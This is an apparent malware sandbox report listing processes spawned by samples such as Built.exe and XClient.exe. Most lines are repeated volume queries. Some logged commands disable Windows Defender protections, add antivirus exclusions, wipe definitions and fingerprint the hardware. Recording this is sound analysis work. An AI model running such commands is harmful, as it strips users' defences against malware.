                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Brokercrt\comReviewsession.exe "C:\Brokercrt\comReviewsession.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeProcess created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\S l r .exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat" "Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Brokercrt\comReviewsession.exe "C:\Brokercrt\comReviewsession.exe"
                        Source: C:\Brokercrt\comReviewsession.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E8880 cpuid 1_2_00007FF76D5E8880
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: GetLocaleInfoW,GetNumberFormatW,2_2_002AA63C
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\libssl-1_1.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_lzma.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_bz2.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_sqlite3.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_socket.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\select.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962 VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI64962\_ssl.pyd VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Built.exe VolumeInformationJump to behavior
